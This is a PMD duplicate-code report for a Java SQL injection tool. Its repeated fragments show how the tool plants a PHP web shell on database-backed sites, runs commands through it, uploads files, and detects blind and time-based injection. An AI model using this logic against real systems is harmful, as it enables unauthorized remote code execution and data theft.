CPD Results
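This document contains the results of PMD's Copy/Paste Detector (CPD) 7.7.0. Each entry below lists the files and starting line numbers that share a duplicated fragment, followed by the fragment itself.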
Duplications
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 59 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 60 |
nameTable, bodyExploit.replace("'", "''"), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "''"), |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 94 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 94 |
nameTable, bodyExploit.replace("'", "''"), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public String getRead(String pathFile) throws AbstractSlidingException { LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); this.injectionModel.injectWithoutIndex(String.format( this.injectionModel.getResourceAccess().getExploitDerby().getModelYaml().getFile().getCreateTable(), |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 97 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 128 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public String getRead(String pathFile) throws AbstractSlidingException { LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK); |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | 138 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 128 |
), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public String getRead(String pathFile) throws AbstractSlidingException { |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 62 |
com/jsql/model/accessible/vendor/ExploitH2.java | 100 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 62 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); |
File | Line |
---|---|
com/jsql/util/bruter/Base16.java | 62 |
com/jsql/util/bruter/Base16.java | 85 |
private static final byte[] UPPER_CASE_DECODE_TABLE = { // 0 1 2 3 4 5 6 7 8 9 A B C D E F -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, -1, -1, -1, -1, -1, -1, // 30-3f 0-9 -1, 10, 11, 12, 13, 14, 15 // 40-46 A-F |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 97 |
com/jsql/model/accessible/vendor/ExploitH2.java | 138 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 96 |
com/jsql/model/accessible/vendor/ExploitPostgres.java | 511 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 128 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public String getRead(String pathFile) throws AbstractSlidingException { |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | 100 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 93 |
), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); |
File | Line |
---|---|
com/jsql/model/injection/strategy/StrategyBlindBin.java | 44 |
com/jsql/model/injection/strategy/StrategyBlindBit.java | 44 |
com/jsql/model/injection/strategy/StrategyTime.java | 44 |
this.injectionModel.getMediatorVendor().getVendor().instance().getModelYaml().getStrategy().getBinary().getTest().getBin() )) { LOGGER.log( LogLevelUtil.CONSOLE_INFORM, AbstractStrategy.FORMAT_STRATEGY_NOT_IMPLEMENTED, this.getName(), this.injectionModel.getMediatorVendor().getVendor() ); return; } this.checkInjection(BlindOperator.OR); this.checkInjection(BlindOperator.AND); this.checkInjection(BlindOperator.STACK); this.checkInjection(BlindOperator.NO_MODE); if (this.isApplicable) { this.allow(); var requestMessageBinary = new Request(); requestMessageBinary.setMessage(Interaction.MESSAGE_BINARY); requestMessageBinary.setParameters(this.injection.getInfoMessage()); this.injectionModel.sendToViews(requestMessageBinary); } else { this.unallow(); } } private void checkInjection(BlindOperator blindOperator) throws StoppedByUserSlidingException { if (this.isApplicable) { return; } LOGGER.log( LogLevelUtil.CONSOLE_DEFAULT, "{} [{}] with [{}]...", () -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_CHECKING_STRATEGY), this::getName, () -> blindOperator ); this.injection = new InjectionBlindBin(this.injectionModel, blindOperator); |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 62 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 93 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); |
File | Line |
---|---|
com/jsql/model/injection/strategy/StrategyBlindBin.java | 82 |
com/jsql/model/injection/strategy/StrategyBlindBit.java | 82 |
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator); this.isApplicable = this.injection.isInjectable(); if (this.isApplicable) { LOGGER.log( LogLevelUtil.CONSOLE_SUCCESS, "{} [{}] injection with [{}]", () -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE), this::getName, () -> blindOperator ); } } @Override public void allow(int... i) { this.injectionModel.appendAnalysisReport( StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName()) + this.injectionModel.getReportWithoutIndex( this.injectionModel.getMediatorVendor().getVendor().instance().sqlTestBlindWithOperator( this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(StringUtil.formatReport(LogLevelUtil.COLOR_GREEN, "<query>"), "0", true), this.injection.getBlindOperator() ), "metadataInjectionProcess", null ) ); this.markVulnerability(Interaction.MARK_BLIND_BIN_VULNERABLE); |
File | Line |
---|---|
com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | 95 |
com/jsql/model/injection/strategy/blind/InjectionVendor.java | 70 |
List<Future<CallableCharInsertion>> listTagTrue = taskExecutor.invokeAll(listCallableTagTrue); this.injectionModel.getMediatorUtils().getThreadUtil().shutdown(taskExecutor); for (var i = 1 ; i < listTagTrue.size() ; i++) { if (this.injectionModel.isStoppedByUser()) { return; } if (this.constantTrueMark.isEmpty()) { this.constantTrueMark = listTagTrue.get(i).get().getOpcodes(); } else { this.constantTrueMark.retainAll(listTagTrue.get(i).get().getOpcodes()); } } } catch (ExecutionException e) { LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e); } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } this.initFalseMarks(); |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitPostgres.java | 409 |
com/jsql/model/accessible/vendor/ExploitPostgres.java | 468 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), bodyExploit.replace("'", "\"") ), ResourceAccess.ADD_LOID); if (StringUtils.isEmpty(loid)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND); return StringUtils.EMPTY; } var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.getResourceAccess().getResultWithCatch(String.format( this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), loid, pathExploit + nameExploit ), ResourceAccess.WRITE_LOID); |
File | Line |
---|---|
com/jsql/model/injection/strategy/blind/InjectionBlindBin.java | 81 |
com/jsql/model/injection/strategy/blind/InjectionBlindBit.java | 75 |
for (Future<CallableBlindBin> futureFalsy: futuresFalsys) { if (this.injectionModel.isStoppedByUser()) { return; } if (this.falseDiffs.isEmpty()) { this.falseDiffs = futureFalsy.get().getDiffsWithReference(); // Init diffs } else { this.falseDiffs.retainAll(futureFalsy.get().getDiffsWithReference()); // Clean un-matching diffs } } } catch (ExecutionException e) { LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e); } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } if (this.injectionModel.isStoppedByUser()) { return; } this.cleanTrueDiffs(injectionModel, blindOperator); } private void cleanTrueDiffs(InjectionModel injectionModel, BlindOperator blindOperator) { ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableGetBlindBinTagTrue"); |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 99 |
com/jsql/model/accessible/vendor/ExploitMysql.java | 102 |
com/jsql/model/accessible/vendor/ExploitPostgres.java | 513 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 130 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | 140 |
com/jsql/model/accessible/vendor/ExploitMysql.java | 102 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 98 |
com/jsql/model/accessible/vendor/ExploitMysql.java | 102 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); if (result.body().contains(DataAccess.LEAD +"y")) { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); } else { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); } } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } catch (IOException | JSqlException e) { throw new JSqlRuntimeException(e); } return urlSuccess; }; this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); |
File | Line |
---|---|
com/jsql/model/injection/strategy/StrategyBlindBin.java | 113 |
com/jsql/model/injection/strategy/StrategyBlindBit.java | 113 |
this.markVulnerability(Interaction.MARK_BLIND_BIN_INVULNERABLE); } @Override public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) throws StoppedByUserSlidingException { return this.injection.inject( this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(sqlQuery, startPosition, false), stoppable ); } @Override public void activateWhenApplicable() { if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) { LOGGER.log( LogLevelUtil.CONSOLE_INFORM, "{} [{}] with [{}]", () -> I18nUtil.valueByKey("LOG_USING_STRATEGY"), this::getName, () -> this.injection.getBlindOperator().name() ); this.injectionModel.getMediatorStrategy().setStrategy(this); var request = new Request(); request.setMessage(Interaction.MARK_BLIND_BIN_STRATEGY); |
File | Line |
---|---|
com/jsql/util/bruter/Base16.java | 64 |
com/jsql/util/bruter/Base16.java | 87 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitH2.java | 84 |
com/jsql/model/accessible/vendor/ExploitH2.java | 122 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getRce().getCreateTable(), nameTable, nameTable, bodyExploit.replace("'", "\"") ), ResourceAccess.TBL_CREATE); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getRce().getScriptSimple(), pathExploit + nameExploit, nameTable ), ResourceAccess.TBL_DUMP); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 41 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 42 |
ModelYamlDerby.class ); } public String createWeb(String pathExploit, String urlExploit) { LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge"); String bodyExploit = StringUtil.base64Decode( this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "''"), |
File | Line |
---|---|
com/jsql/model/injection/strategy/blind/InjectionBlindBin.java | 124 |
com/jsql/model/injection/strategy/blind/InjectionBlindBit.java | 117 |
for (Future<CallableBlindBin> futureTruthy: futuresTruthys) { if (this.injectionModel.isStoppedByUser()) { return; } if (this.trueDiffs.isEmpty()) { this.trueDiffs = futureTruthy.get().getDiffsWithReference(); // Init diffs } else { this.trueDiffs.retainAll(futureTruthy.get().getDiffsWithReference()); // Clean un-matching diffs } this.falseDiffs.removeAll(futureTruthy.get().getDiffsWithReference()); } } catch (ExecutionException e) { LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e); } catch (InterruptedException e) { LOGGER.log(LogLevelUtil.IGNORE, e, e); Thread.currentThread().interrupt(); } } @Override public CallableBlindBin getCallableBitTest(String sqlQuery, int indexChar, int bit) { |
File | Line |
---|---|
com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | 173 |
com/jsql/model/injection/strategy/blind/InjectionVendor.java | 137 |
); try { blindTest.call(); } catch (Exception e) { LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e); } return blindTest.isTrue() && !this.constantTrueMark.isEmpty(); } public String callUrl(String urlString, String metadataInjectionProcess) { return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess); } public String callUrl(String urlString, String metadataInjectionProcess, AbstractCallableBit<?> callableBoolean) { return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess, callableBoolean); } // Getter public String getBlankFalseMark() { return this.blankFalseMark; } public List<Diff> getConstantTrueMark() { return this.constantTrueMark; } } |
File | Line |
---|---|
com/jsql/util/bruter/Base16.java | 64 |
com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Line |
---|---|
com/jsql/util/bruter/Base16.java | 87 |
com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Line |
---|---|
com/jsql/util/bruter/Base16.java | 64 |
com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Line |
---|---|
com/jsql/util/bruter/Base16.java | 87 |
com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 62 |
com/jsql/model/accessible/vendor/ExploitPostgres.java | 427 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 93 |
), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { String result = this.injectionModel.getResourceAccess().callCommand( urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD ); if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); return StringUtils.EMPTY; } var request = new Request(); request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); request.setParameters(urlSuccess); this.injectionModel.sendToViews(request); return urlSuccess; }; return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); } public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { |
File | Line |
---|---|
com/jsql/model/injection/strategy/StrategyBlindBin.java | 82 |
com/jsql/model/injection/strategy/StrategyTime.java | 82 |
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator); this.isApplicable = this.injection.isInjectable(); if (this.isApplicable) { LOGGER.log( LogLevelUtil.CONSOLE_SUCCESS, "{} [{}] injection with [{}]", () -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE), this::getName, () -> blindOperator ); } } @Override public void allow(int... i) { this.injectionModel.appendAnalysisReport( StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName()) + this.injectionModel.getReportWithoutIndex( this.injectionModel.getMediatorVendor().getVendor().instance().sqlTestBlindWithOperator( |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitDerby.java | 49 |
com/jsql/model/accessible/vendor/ExploitDerby.java | 84 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "''"), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 50 |
com/jsql/model/accessible/vendor/ExploitHsqldb.java | 84 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) ) .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); var nameTable = RandomStringUtils.secure().nextAlphabetic(8); var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; this.injectionModel.injectWithoutIndex(String.format( this.modelYaml.getFile().getWrite(), nameTable, nameTable, bodyExploit.replace("'", "\""), nameTable, pathExploit + nameExploit ), ResourceAccess.TBL_CREATE); BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { |
File | Line |
---|---|
com/jsql/model/accessible/vendor/ExploitSqlite.java | 81 |
com/jsql/model/accessible/vendor/ExploitSqlite.java | 116 |
